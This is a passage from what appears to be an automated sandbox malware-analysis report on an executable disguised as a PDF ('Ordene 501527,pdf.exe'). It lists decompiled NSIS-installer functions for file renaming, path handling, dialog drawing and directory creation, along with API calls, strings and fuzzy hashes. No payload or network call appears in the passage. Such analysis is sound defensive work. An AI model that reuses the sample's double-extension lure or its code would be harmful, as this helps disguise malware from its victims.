					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a51c0, "%ls=%ls\r\n", 0x7a55c0, 0x7a5dc0);
						_t53 = _t52 + 0x10;
						E00406281(_t37, 0x400, 0x7a5dc0, 0x7a5dc0,  *((intOrPtr*)( *0x7a8a34 + 0x128)));
						_t12 = E00405D51(0x7a5dc0, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405DD4(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405CB6(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405CB6(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D0C(_t24 + _t46, 0x7a51c0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E03(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D51(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x7a55c0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405eab
0x00405eb4
0x00405ebb
0x00405ec5
0x00405ed9
0x00405f01
0x00405f0c
0x00405f10
0x00405f30
0x00405f37
0x00405f41
0x00405f4e
0x00405f53
0x00405f58
0x00405f5c
0x00405f6b
0x00405f6d
0x00405f7a
0x00405f7e
0x00406019
0x00000000
0x00405f94
0x00405fa1
0x00405fc5
0x00405fc9
0x00405fe8
0x00405fec
0x00405fec
0x00405fee
0x00405ff7
0x00406002
0x0040600d
0x00406013
0x00000000
0x00406013
0x00405fcb
0x00405fce
0x00405fd9
0x00405fd5
0x00405fd7
0x00405fd8
0x00405fd8
0x00405fe0
0x00405fe2
0x00000000
0x00405fe2
0x00405fac
0x00405fb2
0x00000000
0x00405fb2
0x00405f7e
0x00405f5c
0x00405edb
0x00405ee6
0x00405eef
0x00405ef3
0x00000000
0x00000000
0x00405ef3
0x00406024

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406046,00000000,00000000), ref: 00405EE6
GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405EEF

Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8

GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F0C
wsprintfA.USER32 ref: 00405F2A
GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405F65
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F74
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAC
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406002
GlobalFree.KERNEL32(00000000), ref: 00406013
CloseHandle.KERNEL32(00000000), ref: 0040601A

Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Ordene 501527,pdf.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

Strings

%ls=%ls, xrefs: 00405F20
[Rename], xrefs: 00405F94, 00405FA6

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
Instruction ID: 89c32d2153287748ec41ed641a28e9b16702ce233dbd70bd77460b6709aa78c6
Opcode Fuzzy Hash: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
Instruction Fuzzy Hash: F8312871601B05BBD220AB619D48F6B3A9CEF85744F14003EFA42F62D2DA7CD8118ABD

Uniqueness

Uniqueness Score: -1.00%

Function 004064F3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004064F3(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405BA7(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B5D(L"*?|<>/\":", _t5))) == 0) {
							E00405D0C(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004064f5
0x004064fe
0x00406515
0x00406515
0x0040651c
0x00406528
0x00406528
0x0040652b
0x0040652e
0x00406533
0x00406535
0x0040653e
0x00406542
0x0040655f
0x00406567
0x00406567
0x0040656c
0x0040656e
0x00406571
0x00406576
0x00406577
0x0040657b
0x0040657b
0x0040657c
0x00406583
0x00406585
0x0040658c
0x00000000
0x00000000
0x00406594
0x0040659a
0x00000000
0x00000000
0x00000000
0x0040659a
0x0040659f

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ordene 501527,pdf.exe" ,0040332B,C:\Users\user\AppData\Local\Temp\,75173420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ordene 501527,pdf.exe" ,0040332B,C:\Users\user\AppData\Local\Temp\,75173420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ordene 501527,pdf.exe" ,0040332B,C:\Users\user\AppData\Local\Temp\,75173420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D

Strings

"C:\Users\user\Desktop\Ordene 501527,pdf.exe" , xrefs: 004064F3
C:\Users\user\AppData\Local\Temp\, xrefs: 004064F4, 004064F9
*?|<>/":, xrefs: 00406545

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Ordene 501527,pdf.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2281854549
Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040425B Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040425B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x0040426d
0x00404301
0x00000000
0x00404301
0x0040427e
0x00404282
0x00000000
0x00000000
0x00404288
0x00404291
0x00404294
0x00404294
0x0040429a
0x004042a0
0x004042a0
0x004042ac
0x004042b2
0x004042b9
0x004042bc
0x004042bf
0x004042c1
0x004042c1
0x004042c9
0x004042cf
0x004042cf
0x004042d9
0x004042de
0x004042e1
0x004042e6
0x004042e9
0x004042e9
0x004042f9
0x004042f9
0x00000000

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404278
GetSysColor.USER32(00000000), ref: 00404294
SetTextColor.GDI32(?,00000000), ref: 004042A0
SetBkMode.GDI32(?,?), ref: 004042AC
GetSysColor.USER32(?), ref: 004042BF
SetBkColor.GDI32(?,?), ref: 004042CF
DeleteObject.GDI32(?), ref: 004042E9
CreateBrushIndirect.GDI32(?), ref: 004042F3

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction ID: 89996262c0d64ac0fda19422125f93b67266a0f1ca122a9c1e6306c3a20023a3
Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction Fuzzy Hash: 34219271500704ABCB209F68DE08B4BBBF8AF41714B048A6DFD92A22A0C734D904CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x78b6d4; // 0x8fd55
					_t11 =  *0x7976dc; // 0x91a80
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402de7
0x00402df5
0x00402dfb
0x00402dfb
0x00402e09
0x00402e0b
0x00402e11
0x00402e18
0x00402e1a
0x00402e1a
0x00402e30
0x00402e40
0x00402e52
0x00402e52
0x00402e5a

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
MulDiv.KERNEL32(0008FD55,00000064,00091A80), ref: 00402E20
wsprintfW.USER32 ref: 00402E30
SetWindowTextW.USER32(?,?), ref: 00402E40
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52

Strings

verifying installer: %d%%, xrefs: 00402E2A

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
Instruction ID: c563a075df83d92fb310a5016e42997ab7e5782e6b78b1479044c0af3efb3f55
Opcode Fuzzy Hash: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
Instruction Fuzzy Hash: DE01677064020CBFDF149F50DD49FAA3B68AB00304F108039FA06F51D0DBB98965CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00405792 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405792(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				if(CreateDirectoryW(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x0040579d
0x004057a1
0x004057a4
0x004057aa
0x004057ae
0x004057b2
0x004057ba
0x004057c1
0x004057c7
0x004057ce
0x004057dd
0x004057df
0x00000000
0x004057df
0x004057e9
0x004057f0
0x00405806
0x00000000
0x00000000
0x00000000
0x00405808
0x0040580c

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057D5
GetLastError.KERNEL32 ref: 004057E9
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057FE
GetLastError.KERNEL32 ref: 00405808

Strings

C:\Users\user\Desktop, xrefs: 00405792

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3370423016
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: 488e367ac99084f0472557c0a26963b348c4b9c4a011ef6404f7c6369f031e52
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 03011A71C00619DADF009FA1C9447EFBBB4EF14354F00803AD945B6281D7789618CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00405BDB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BDB(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405B5D(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}

0x00405be4
0x00405beb
0x00405bee
0x00405bf0
0x00405bf6
0x00405c0e
0x00405c30
0x00000000
0x00405c16
0x00405c18
0x00405c19
0x00405c1c
0x00405c1d
0x00405c26
0x00000000
0x00000000
0x00405c29
0x00405c2c
0x00000000
0x00000000
0x00000000
0x00405c2c
0x00000000
0x00405c19
0x00405c05
0x00000000
0x00405c06

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,?,?,75173420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75173420,00000000), ref: 00405BE9
CharNextW.USER32(00000000), ref: 00405BEE
CharNextW.USER32(00000000), ref: 00405C06

Strings

C:\Users\user\AppData\Local\Temp\nsd84B6.tmp, xrefs: 00405BDC

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsd84B6.tmp
API String ID: 3213498283-498781119
Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction ID: 1410c8af8588119ed7c7bec0a33194e6879e2746ee2e5cb83f2c5ed70d44d846
Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction Fuzzy Hash: 26F09022918B2D95FF3177584C55E7766B8EB55760B00803BE641B72C0D3F85C818EAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405B30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405B30(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405b31
0x00405b3e
0x00405b3f
0x00405b4a
0x00405b52
0x00405b52
0x00405b5a

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75173420,0040359C,?,00000006,00000008,0000000A), ref: 00405B36
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75173420,0040359C,?,00000006,00000008,0000000A), ref: 00405B40
lstrcatW.KERNEL32(?,0040A014), ref: 00405B52

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction ID: 96ba7b99f7925edb235d18d004fc1fe51c5fb87b1b333c4bf7b8a2937e57358f
Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction Fuzzy Hash: 44D05E21101924AAC1117B448C04EDF72ACAE45344342007AF241B30A1CB78295286FD

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

